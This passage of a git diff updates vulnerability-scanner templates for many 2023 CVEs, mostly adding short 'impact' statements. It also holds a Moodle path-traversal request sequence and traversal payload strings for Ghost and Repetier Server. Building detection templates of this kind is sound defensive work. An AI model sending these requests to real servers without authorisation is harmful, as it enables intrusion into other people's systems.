a/http/cves/2023/CVE-2023-30210.yaml +++ b/http/cves/2023/CVE-2023-30210.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OURPHP <= 7.2.0 is vulnerable to Cross Site Scripting (XSS) via /client/manage/ourphp_tz.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to a patched version of OURPHP (7.2.1 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-30212.yaml b/http/cves/2023/CVE-2023-30212.yaml index 8e53c11708..d94e9487c7 100644 --- a/http/cves/2023/CVE-2023-30212.yaml +++ b/http/cves/2023/CVE-2023-30212.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | OURPHP <= 7.2.0 is vulnerale to Cross Site Scripting (XSS) via /client/manage/ourphp_out.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | Upgrade to a patched version of OURPHP (7.2.1 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-30256.yaml b/http/cves/2023/CVE-2023-30256.yaml index 493fc87c27..335910e7c8 100644 --- a/http/cves/2023/CVE-2023-30256.yaml +++ b/http/cves/2023/CVE-2023-30256.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross Site Scripting vulnerability found in Webkil QloApps v.1.5.2 allows a remote attacker to obtain sensitive information via the back and email_create parameters in the AuthController.php file. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-30777.yaml b/http/cves/2023/CVE-2023-30777.yaml index c7eb3543bb..d40bfc5927 100644 --- a/http/cves/2023/CVE-2023-30777.yaml +++ b/http/cves/2023/CVE-2023-30777.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Advanced Custom Fields beofre 6.1.6 is susceptible to cross-site scripting via the post_status parameter due to insufficient input sanitization and output escaping. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Fixed in version 6.1.6. reference: - https://wpscan.com/vulnerability/95ded80f-a47b-411e-bd17-050439bf565f diff --git a/http/cves/2023/CVE-2023-30943.yaml b/http/cves/2023/CVE-2023-30943.yaml index 4861eadc9a..1b949bf676 100644 --- a/http/cves/2023/CVE-2023-30943.yaml +++ b/http/cves/2023/CVE-2023-30943.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The vulnerability was found Moodle which exists because the application allows a user to control path of the older to create in TinyMCE loaders. A remote user can send a specially crafted HTTP request and create arbitrary folders on the system. Moodle versions 4.1.x before 4.1.3 and 4.2.x before 4.2.0 are susceptible to an unauthenticated arbitrary folder creation, tracked as CVE-2023-30943. An attacker can leverage the creation of arbitrary folders to carry out a Stored Cross-Site Scripting (XSS) attack on the administration panel, resulting in arbitrary code execution on the server as soon as an administrator visits the panel. + impact: | + Successful exploitation of these vulnerabilities could lead to unauthorized access, data theft, and potential compromise of the Moodle application and its users. reference: - https://www.sonarsource.com/blog/playing-dominos-with-moodles-security-1/?utm_source=twitter&utm_medium=social&utm_campaign=wordpress&utm_content=security&utm_term=mofu - https://nvd.nist.gov/vuln/detail/CVE-2023-30943 @@ -25,24 +27,22 @@ http: GET /lib/editor/tiny/loader.php?rev=a/../../../../html/pix/f/.png HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - - | GET /login/index.php HTTP/2 Host: {{Hostname}} - - | POST /login/index.php HTTP/2 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded anchor=&logintoken={{token}}&username={{username}}&password={{password}} - - | GET /admin/tool/filetypes/edit.php?name=add HTTP/1.1 Host: {{Hostname}} host-redirects: true cookie-reuse: true + matchers-condition: and matchers: - type: word diff --git a/http/cves/2023/CVE-2023-31059.yaml b/http/cves/2023/CVE-2023-31059.yaml index 8dae9091af..edfbdad248 100644 --- a/http/cves/2023/CVE-2023-31059.yaml +++ b/http/cves/2023/CVE-2023-31059.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Repetier Server through 1.4.10 allows ..%5c directory traversal for reading files that contain credentials, as demonstrated by connectionLost.php. + impact: | + An attacker can read, modify, or delete arbitrary files on the server, potentially leading to unauthorized access, data leakage, or system compromise. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Repetier Server. reference: diff --git a/http/cves/2023/CVE-2023-31548.yaml b/http/cves/2023/CVE-2023-31548.yaml index 99e24d0a7f..d4c37f8ad1 100644 --- a/http/cves/2023/CVE-2023-31548.yaml +++ b/http/cves/2023/CVE-2023-31548.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A stored Cross-site scripting (XSS) vulnerability in the FundRaiserEditor.php component of ChurchCRM v4.5.3 allows attackers to execute arbitrary web scripts or HTML via a crafted payload. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To remediate this issue, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: diff --git a/http/cves/2023/CVE-2023-32117.yaml b/http/cves/2023/CVE-2023-32117.yaml index e426d8e267..b6b93e1615 100644 --- a/http/cves/2023/CVE-2023-32117.yaml +++ b/http/cves/2023/CVE-2023-32117.yaml @@ -6,6 +6,8 @@ info: severity: high description: | The Integrate Google Drive plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on several REST API endpoints in versions up to, and including, 1.1.99. This makes it possible for unauthenticated attackers to perform a wide variety of operations, such as moving files, creating folders, copying details, and much more. + impact: | + Unauthenticated attackers can access and manipulate sensitive data in Google Drive remediation: Fixed in 1.2.0 reference: - https://github.com/RandomRobbieBF/CVE-2023-32117 diff --git a/http/cves/2023/CVE-2023-32235.yaml b/http/cves/2023/CVE-2023-32235.yaml index 8a3b9810df..da5a42a116 100644 --- a/http/cves/2023/CVE-2023-32235.yaml +++ b/http/cves/2023/CVE-2023-32235.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Ghost before 5.42.1 allows remote attackers to read arbitrary files within the active theme's folder via /assets/built%2F..%2F..%2F/ directory traversal. This occurs in frontend/web/middleware/static-theme.js. + impact: | + An attacker can exploit this vulnerability to access sensitive files on the server, potentially leading to unauthorized disclosure of sensitive information. remediation: Fixed in version 5.42.1 reference: - https://github.com/advisories/GHSA-wf7x-fh6w-34r6 diff --git a/http/cves/2023/CVE-2023-32243.yaml b/http/cves/2023/CVE-2023-32243.yaml index a0d64051fb..e10f5b2f77 100644 --- a/http/cves/2023/CVE-2023-32243.yaml +++ b/http/cves/2023/CVE-2023-32243.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Improper Authentication vulnerability in WPDeveloper Essential Addons for Elementor allows Privilege Escalation. This issue affects Essential Addons for Elementor: from 5.4.0 through 5.7.1. + impact: | + An attacker can gain unauthorized access to user accounts and potentially take control of the affected WordPress website. remediation: | Update WordPress Elementor Lite plugin to the latest version (5.7.2) or apply the patch provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-32315.yaml b/http/cves/2023/CVE-2023-32315.yaml index 2959d97e70..83a44e8761 100644 --- a/http/cves/2023/CVE-2023-32315.yaml +++ b/http/cves/2023/CVE-2023-32315.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Openfire is an XMPP server licensed under the Open Source Apache License. Openfire's administrative console, a web-based application, was found to be vulnerable to a path traversal attack via the setup environment. This permitted an unauthenticated user to use the unauthenticated Openfire Setup Environment in an already configured Openfire environment to access restricted pages in the Openfire Admin Console reserved for administrative users. This vulnerability affects all versions of Openfire that have been released since April 2015, starting with version 3.10.0. + impact: | + Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to the Openfire Administration Console. remediation: | The problem has been patched in Openfire release 4.7.5 and 4.6.8, and further improvements will be included in the yet-to-be released first version on the 4.8 branch (which is expected to be version 4.8.0). Users are advised to upgrade. If an Openfire upgrade isn’t available for a specific release, or isn’t quickly actionable, users may see the linked github advisory (GHSA-gw42-f939-fhvm) for mitigation advice. reference: diff --git a/http/cves/2023/CVE-2023-32563.yaml b/http/cves/2023/CVE-2023-32563.yaml index c0b54eaa85..ba3b26dfc6 100644 --- a/http/cves/2023/CVE-2023-32563.yaml +++ b/http/cves/2023/CVE-2023-32563.yaml @@ -5,6 +5,8 @@ info: author: princechaddha severity: critical description: An unauthenticated attacker could achieve the code execution through a RemoteControl server. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches or updates provided by Ivanti to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-33338.yaml b/http/cves/2023/CVE-2023-33338.yaml index 0eec105508..d51e1ddfd6 100644 --- a/http/cves/2023/CVE-2023-33338.yaml +++ b/http/cves/2023/CVE-2023-33338.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Old Age Home Management 1.0 is vulnerable to SQL Injection via the username parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Apply the latest patches or updates provided by the vendor to fix the SQL Injection vulnerability in the Old Age Home Management System v1.0. reference: diff --git a/http/cves/2023/CVE-2023-33439.yaml b/http/cves/2023/CVE-2023-33439.yaml index 16238a47b5..7648971278 100644 --- a/http/cves/2023/CVE-2023-33439.yaml +++ b/http/cves/2023/CVE-2023-33439.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Sourcecodester Faculty Evaluation System v1.0 is vulnerable to SQL Injection via /eval/admin/manage_task.php?id= + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-33440.yaml b/http/cves/2023/CVE-2023-33440.yaml index cad0838805..cf91701f49 100644 --- a/http/cves/2023/CVE-2023-33440.yaml +++ b/http/cves/2023/CVE-2023-33440.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Sourcecodester Faculty Evaluation System v1.0 is vulnerable to arbitrary code execution via /eval/ajax.php?action=save_user. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-3345.yaml b/http/cves/2023/CVE-2023-3345.yaml index 9eccb01be5..caa2ebae3b 100644 --- a/http/cves/2023/CVE-2023-3345.yaml +++ b/http/cves/2023/CVE-2023-3345.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | The plugin does not properly safeguards sensitive user information, like other user's email addresses, making it possible for any students to leak them via some of the plugin's REST API endpoints. + impact: | + An attacker can gain unauthorized access to sensitive information. remediation: | Upgrade LMS by Masteriyo to version 1.6.8 or higher to fix the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-33510.yaml b/http/cves/2023/CVE-2023-33510.yaml index e3c5c2d336..f516a0fe85 100644 --- a/http/cves/2023/CVE-2023-33510.yaml +++ b/http/cves/2023/CVE-2023-33510.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Jeecg P3 Biz Chat 1.0.5 allows remote attackers to read arbitrary files through specific parameters. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the entire system. remediation: | Apply the latest patch or update provided by the vendor to fix the LFI vulnerability in Jeecg P3 Biz Chat. reference: diff --git a/http/cves/2023/CVE-2023-33568.yaml b/http/cves/2023/CVE-2023-33568.yaml index e5c6254c3a..1f87746a07 100644 --- a/http/cves/2023/CVE-2023-33568.yaml +++ b/http/cves/2023/CVE-2023-33568.yaml @@ -6,6 +6,8 @@ info: severity: high description: | An issue in Dolibarr 16 before 16.0.5 allows unauthenticated attackers to perform a database dump and access a company's entire customer file, prospects, suppliers, and employee information if a contact file exists. + impact: | + The attacker can access and steal sensitive information from the contacts database, potentially leading to data breaches and privacy violations. remediation: | Apply the latest security patch or upgrade to a patched version of Dolibarr to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34124.yaml b/http/cves/2023/CVE-2023-34124.yaml index bc1c14d998..77e30c55bd 100644 --- a/http/cves/2023/CVE-2023-34124.yaml +++ b/http/cves/2023/CVE-2023-34124.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The authentication mechanism in SonicWall GMS and Analytics Web Services had insufficient checks, allowing authentication bypass. This issue affects GMS: 9.3.2-SP1 and earlier versions; Analytics: 2.5.0.4-R7 and earlier versions + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the target system. remediation: | Apply the latest security patches or updates provided by SonicWall to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34192.yaml b/http/cves/2023/CVE-2023-34192.yaml index 2ffca5bce9..1bbded7087 100644 --- a/http/cves/2023/CVE-2023-34192.yaml +++ b/http/cves/2023/CVE-2023-34192.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Cross Site Scripting vulnerability in Zimbra ZCS v.8.8.15 allows a remote authenticated attacker to execute arbitrary code via a crafted script to the /h/autoSaveDraft function. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information. remediation: | Apply the latest security patches or upgrade to a non-vulnerable version of Zimbra Collaboration Suite (ZCS). reference: diff --git a/http/cves/2023/CVE-2023-34362.yaml b/http/cves/2023/CVE-2023-34362.yaml index 1e64f4fdc2..4a5d69301d 100644 --- a/http/cves/2023/CVE-2023-34362.yaml +++ b/http/cves/2023/CVE-2023-34362.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In Progress MOVEit Transfer before 2021.0.6 (13.0.6), 2021.1.4 (13.1.4), 2022.0.4 (14.0.4), 2022.1.5 (14.1.5), and 2023.0.1 (15.0.1), a SQL injection vulnerability has been found in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain access to MOVEit Transfer's database. Depending on the database engine being used (MySQL, Microsoft SQL Server, or Azure SQL), an attacker may be able to infer information about the structure and contents of the database, and execute SQL statements that alter or delete database elements. NOTE: this is exploited in the wild in May and June 2023; exploitation of unpatched systems can occur via HTTP or HTTPS. All versions (e.g., 2020.0 and 2019x) before the five explicitly mentioned versions are affected, including older unsupported versions. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data theft, and potential compromise of the entire server. remediation: | Apply the latest security patches and updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34537.yaml b/http/cves/2023/CVE-2023-34537.yaml index a9a15f76ed..fd27d2d085 100644 --- a/http/cves/2023/CVE-2023-34537.yaml +++ b/http/cves/2023/CVE-2023-34537.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A Reflected XSS was discovered in HotelDruid version 3.0.5, an attacker can issue malicious code/command on affected webpage's parameter to trick user on browser and/or exfiltrate data. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34598.yaml b/http/cves/2023/CVE-2023-34598.yaml index f94c51bc81..c03ae99f00 100644 --- a/http/cves/2023/CVE-2023-34598.yaml +++ b/http/cves/2023/CVE-2023-34598.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Gibbon v25.0.0 is vulnerable to a Local File Inclusion (LFI) vulnerability where it's possible to include the content of several files present in the installation folder in the server's response. + impact: | + The LFI vulnerability can lead to unauthorized access to sensitive files, potentially exposing sensitive information or allowing for further exploitation. remediation: | Upgrade to a patched version of Gibbon or apply the necessary security patches to mitigate the LFI vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34599.yaml b/http/cves/2023/CVE-2023-34599.yaml index 9d91847c33..2b4c546afe 100644 --- a/http/cves/2023/CVE-2023-34599.yaml +++ b/http/cves/2023/CVE-2023-34599.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Multiple Cross-Site Scripting (XSS) vulnerabilities have been identified in Gibbon v25.0.0, which enable attackers to execute arbitrary Javascript code. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-3460.yaml b/http/cves/2023/CVE-2023-3460.yaml index 08f2b0d5c8..021a2783e6 100644 --- a/http/cves/2023/CVE-2023-3460.yaml +++ b/http/cves/2023/CVE-2023-3460.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | The plugin does not prevent visitors from creating user accounts with arbitrary capabilities, effectively allowing attackers to create administrator accounts at will. This is actively being exploited in the wild. + impact: | + Unauthenticated users can gain unauthorized access and perform actions with elevated privileges. remediation: | Upgrade to Ultimate Member version 2.6.7 or later. reference: diff --git a/http/cves/2023/CVE-2023-34659.yaml b/http/cves/2023/CVE-2023-34659.yaml index 6ba3496b13..bf89a72caf 100644 --- a/http/cves/2023/CVE-2023-34659.yaml +++ b/http/cves/2023/CVE-2023-34659.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the id parameter of the /jeecg-boot/jmreport/show interface. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL queries, potentially leading to unauthorized access, data leakage, or data manipulation. remediation: | Upgrade JeecgBoot to a patched version or apply the necessary security patches provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-3479.yaml b/http/cves/2023/CVE-2023-3479.yaml index 964713c327..07922a7043 100644 --- a/http/cves/2023/CVE-2023-3479.yaml +++ b/http/cves/2023/CVE-2023-3479.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Cross-site Scripting (XSS) - Reflected in GitHub repository hestiacp/hestiacp prior to 1.7.8. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of a victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to the latest version of Hestiacp (1.7.9 or higher) to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34843.yaml b/http/cves/2023/CVE-2023-34843.yaml index 8564178b1b..9f4b6e7861 100644 --- a/http/cves/2023/CVE-2023-34843.yaml +++ b/http/cves/2023/CVE-2023-34843.yaml @@ -6,6 +6,8 @@ info: severity: high description: | traggo/server version 0.3.0 is vulnerable to directory traversal. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files, remote code execution, and potential compromise of the server. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-34960.yaml b/http/cves/2023/CVE-2023-34960.yaml index 95c7985429..fdf7fe6d78 100644 --- a/http/cves/2023/CVE-2023-34960.yaml +++ b/http/cves/2023/CVE-2023-34960.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | A command injection vulnerability in the wsConvertPpt component of Chamilo v1.11.* up to v1.11.18 allows attackers to execute arbitrary commands via a SOAP API call with a crafted PowerPoint name. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access, data leakage, and potential compromise of the entire system. remediation: | Apply the latest security patches or updates provided by the vendor to fix the command injection vulnerability in Chamilo LMS. reference: diff --git a/http/cves/2023/CVE-2023-35078.yaml b/http/cves/2023/CVE-2023-35078.yaml index 692c37e8b1..c7957535a0 100644 --- a/http/cves/2023/CVE-2023-35078.yaml +++ b/http/cves/2023/CVE-2023-35078.yaml @@ -5,6 +5,8 @@ info: author: parth,pdresearch severity: critical description: Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, through 11.10 allows remote attackers to obtain PII, add an administrative account, and change the configuration because of an authentication bypass, as exploited in the wild in July 2023. A patch is available. + impact: | + Successful exploitation of this vulnerability could allow an attacker to bypass authentication and gain unauthorized access to the affected system. remediation: | Apply the latest security patches or updates provided by Ivanti to fix the authentication bypass vulnerability in Endpoint Manager Mobile (EPMM). reference: diff --git a/http/cves/2023/CVE-2023-35082.yaml b/http/cves/2023/CVE-2023-35082.yaml index 63c61a2709..34e9650523 100644 --- a/http/cves/2023/CVE-2023-35082.yaml +++ b/http/cves/2023/CVE-2023-35082.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core, Since CVE-2023-35082 arises from the same place as CVE-2023-35078, specifically the permissive nature of certain entries in the mifs web application’s security filter chain. + impact: | + Remote attackers can exploit this vulnerability to gain unauthorized access to sensitive data and perform malicious actions. remediation: Upgrading to the latest version of Ivanti Endpoint Manager Mobile (EPMM) reference: - https://www.rapid7.com/blog/post/2023/08/02/cve-2023-35082-mobileiron-core-unauthenticated-api-access-vulnerability/ diff --git a/http/cves/2023/CVE-2023-35843.yaml b/http/cves/2023/CVE-2023-35843.yaml index 94e5fb7d71..0905ba7d1b 100644 --- a/http/cves/2023/CVE-2023-35843.yaml +++ b/http/cves/2023/CVE-2023-35843.yaml @@ -6,6 +6,8 @@ info: severity: high description: | NocoDB through 0.106.1 has a path traversal vulnerability that allows an unauthenticated attacker to access arbitrary files on the server by manipulating the path parameter of the /download route. This vulnerability could allow an attacker to access sensitive files and data on the server, including configuration files, source code, and other sensitive information. + impact: | + The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database contents, and other confidential data. remediation: | Upgrade NocoDB to a version higher than 0.106.1 to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-35844.yaml b/http/cves/2023/CVE-2023-35844.yaml index bdcdb2df02..7de5f8a012 100644 --- a/http/cves/2023/CVE-2023-35844.yaml +++ b/http/cves/2023/CVE-2023-35844.yaml @@ -9,6 +9,8 @@ info: has insecure file endpoints, e.g., they allow .. directory traversal and do not ensure that an intended file extension (.csv or .png) is used. + impact: | + The vulnerability can lead to unauthorized access to sensitive information, potentially exposing user credentials, database credentials, and other confidential data. remediation: | Upgrade Lightdash to a version higher than 0.510.3 to mitigate the vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-35885.yaml b/http/cves/2023/CVE-2023-35885.yaml index e7072f1c3d..a0f0299e09 100644 --- a/http/cves/2023/CVE-2023-35885.yaml +++ b/http/cves/2023/CVE-2023-35885.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CloudPanel 2 before 2.3.1 has insecure file-manager cookie authentication. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system. remediation: | Upgrade Cloudpanel to version 2.3.1 or later to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-36287.yaml b/http/cves/2023/CVE-2023-36287.yaml index 2c8b4321c2..70179033da 100644 --- a/http/cves/2023/CVE-2023-36287.yaml +++ b/http/cves/2023/CVE-2023-36287.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST controller parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To remediate this issue, it is recommended to apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-36289.yaml b/http/cves/2023/CVE-2023-36289.yaml index 34f72b85e7..1b75b16f67 100644 --- a/http/cves/2023/CVE-2023-36289.yaml +++ b/http/cves/2023/CVE-2023-36289.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | An unauthenticated Cross-Site Scripting (XSS) vulnerability found in Webkul QloApps 1.6.0 allows an attacker to obtain a user's session cookie and then impersonate that user via POST email_create and back parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | To remediate this issue, it is recommended to apply the latest security patches or updates provided by the vendor. reference: diff --git a/http/cves/2023/CVE-2023-36346.yaml b/http/cves/2023/CVE-2023-36346.yaml index af4315fe56..27e93052b1 100644 --- a/http/cves/2023/CVE-2023-36346.yaml +++ b/http/cves/2023/CVE-2023-36346.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -21,8 +23,8 @@ info: epss-score: 0.00075 cpe: cpe:2.3:a:codekop:codekop:2.0:*:*:*:*:*:*:* metadata: - max-request: 1 verified: "true" + max-request: 1 vendor: codekop product: codekop tags: packetstorm,cve,cve2023,xss,pos,codekop,unauth diff --git a/http/cves/2023/CVE-2023-36844.yaml b/http/cves/2023/CVE-2023-36844.yaml index 8ed170acac..2a87622f33 100644 --- a/http/cves/2023/CVE-2023-36844.yaml +++ b/http/cves/2023/CVE-2023-36844.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Multiple cves in Juniper Network (CVE-2023-36844|CVE-2023-36845|CVE-2023-36846|CVE-2023-36847).A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series allows an unauthenticated, network-based attacker to control certain, important environments variables. Utilizing a crafted request an attacker is able to modify certain PHP environments variables leading to partial loss of integrity, which may allow chaining to other vulnerabilities. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected Juniper Devices. remediation: | Apply the latest security patches and firmware updates provided by Juniper Networks to mitigate this vulnerability. reference: diff --git a/http/cves/2023/CVE-2023-36845.yaml b/http/cves/2023/CVE-2023-36845.yaml index aea29fd87a..1445367d8f 100644 --- a/http/cves/2023/CVE-2023-36845.yaml +++ b/http/cves/2023/CVE-2023-36845.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | A PHP External Variable Modification vulnerability in J-Web of Juniper Networks Junos OS on EX Series and SRX Series allows an unauthenticated, network-based attacker to control certain environments variables to execute remote commands + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected device. reference: - https://vulncheck.com/blog/juniper-cve-2023-36845 - https://nvd.nist.gov/vuln/detail/CVE-2023-36845 diff --git a/http/cves/2023/CVE-2023-36934.yaml b/http/cves/2023/CVE-2023-36934.yaml index 118cb4b175..5a90d38408 100644 --- a/http/cves/2023/CVE-2023-36934.yaml +++ b/http/cves/2023/CVE-2023-36934.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | In Progress MOVEit Transfer before 2020.1.11 (12.1.11), 2021.0.9 (13.0.9), 2021.1.7 (13.1.7), 2022.0.7 (14.0.7), 2022.1.8 (14.1.8), and 2023.0.4 (15.0.4), a SQL injection vulnerability has been identified in the MOVEit Transfer web application that could allow an unauthenticated attacker to gain unauthorized access to the MOVEit Transfer database. An attacker could submit a crafted payload to a MOVEit Transfer application endpoint that could result in modification and disclosure of MOVEit database content. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized access to sensitive data, modification of data, or even complete compromise of the application and underlying systems. remediation: | Apply the latest security patches or updates provided by the vendor to fix the SQL Injection vulnerability in the MOVEit Transfer application. reference: diff --git a/http/cves/2023/CVE-2023-37265.yaml b/http/cves/2023/CVE-2023-37265.yaml index f337c7cc4c..df8c2aee73 100644 --- a/http/cves/2023/CVE-2023-37265.yaml +++ b/http/cves/2023/CVE-2023-37265.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CasaOS is an open-source Personal Cloud system. Due to a lack of IP address verification an unauthenticated attackers can execute arbitrary commands as `root` on CasaOS instances. The problem was addressed by improving the detection of client IP addresses in `391dd7f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly. + impact: | + Successful exploitation allows unauthorized access to the CasaOS system. remediation: The problem was addressed by improving the detection of client IP addresses in 391dd7f. This patch is part of CasaOS 0.4.4. reference: - https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad diff --git a/http/cves/2023/CVE-2023-37266.yaml b/http/cves/2023/CVE-2023-37266.yaml index 3ac1552273..1bd7fbcd1d 100644 --- a/http/cves/2023/CVE-2023-37266.yaml +++ b/http/cves/2023/CVE-2023-37266.yaml @@ -6,6 +6,8 @@ info: severity: critical description: | CasaOS is an open-source Personal Cloud system. Unauthenticated attackers can craft arbitrary JWTs and access features that usually require authentication and execute arbitrary commands as `root` on CasaOS instances. This problem was addressed by improving the validation of JWTs in commit `705bf1f`. This patch is part of CasaOS 0.4.4. Users should upgrade to CasaOS 0.4.4. If they can't, they should temporarily restrict access to CasaOS to untrusted users, for instance by not exposing it publicly. + impact: | + Successful exploitation allows unauthorized access to the CasaOS system. remediation: The problem was addressed by improving the validation of JWTs in 705bf1f. This patch is part of CasaOS 0.4.4. reference: - https://github.com/IceWhaleTech/CasaOS/commit/705bf1facbffd2ca40b159b0303132b6fdf657ad diff --git a/http/cves/2023/CVE-2023-37270.yaml b/http/cves/2023/CVE-2023-37270.yaml index 9b750d38a1..754febe701 100644 --- a/http/cves/2023/CVE-2023-37270.yaml +++ b/http/cves/2023/CVE-2023-37270.yaml @@ -6,6 +6,8 @@ info: severity: high description: | Piwigo is open source photo gallery software. Prior to version 13.8.0, there is a SQL Injection vulnerability in the login of the administrator screen. The SQL statement that acquires the HTTP Header `User-Agent` is 